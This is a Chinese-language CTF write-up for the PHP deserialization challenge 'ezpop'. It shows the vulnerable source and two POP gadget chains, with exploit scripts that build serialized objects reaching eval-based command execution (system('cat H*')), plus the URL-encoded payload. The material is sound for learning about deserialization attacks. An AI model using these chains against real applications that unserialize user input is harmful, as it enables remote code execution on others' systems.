dasctf_x_su_web1

常规反序列化, 题目名字:ezpop

题目源码

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}
?>

链子_1

fin::__destruct   //字符串拼接,跳转到toString
what::__toString
fin::__run        //将实例当为方法使用,跳转到invoke
crow::__invoke    //调用不存在的函数world,跳转到call
fin::__call  
mix::get_flag

EXP

<?php
class crow
{
    public $v1;
    public $v2;
    /*
    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        echo 'get invoke  ';
        $this->v1->world();
    }
*/
}

class fin
{
    public $f1;
    /*
    public function __destruct()
    {
        echo 'get destruct   ';
        echo $this->f1 . '114514';
    }

     public function run()
     {
         ($this->f1)();
     }

     public function __call($a, $b)
     {
         echo 'get call  ';
         echo $this->f1->get_flag();
     }
*/
}

class what
{
    public $a;
/*
    public function __toString()
    {
        echo 'get toString   ';
        $this->a->run();
        return 'hello';
    }
*/
}
class mix
{
    public $m1;
    public function __construct()
    {
        $this->m1 = "?> <?php system('cat H*');?>";
    }
    /*
    public function run()
    {
        echo 'get run  ';
        ($this->m1)();
    }

    public function get_flag()
    {
        echo 'get it  ';
        eval('#'.$this->m1);
    }
*/
}
$fin = new fin();
$what = new what();
$fin2 = new fin();
$crow = new crow();
$fin3 = new fin();
$mix = new mix();
$fin3->f1 = $mix;
$crow->v1 = $fin3;
$fin2->f1 = $crow;
$what->a = $fin2;
$fin->f1 = $what;
$BB = urlencode(serialize($fin));
print_r($BB);

运行得到payload

O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A28%3A%22%3F%3E+%3C%3Fphp+system%28%27cat+H%2A%27%29%3B%3F%3E%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7D

链子_2

看了别人的wp发现还有其他链子

fin::__destruct
↓↓↓
what::__toString
↓↓↓
mix::run
↓↓↓
crow::__invoke
↓↓↓
fin::__call
↓↓↓
mix::get_flag

其实也相差不大,这条链子是通过mix类的run()函数跳转到crow类中

EXP

<?php
class crow
{
    public $v1;
    public $v2;

    public function __construct($v1)
    {
        $this->v1 = $v1;
    }
}

class fin
{
    public $f1;

    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public $m1;

    public function __construct($m1)
    {
        $this->m1 = $m1;
    }

}

$f = new mix("\nsystem('cat *');");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));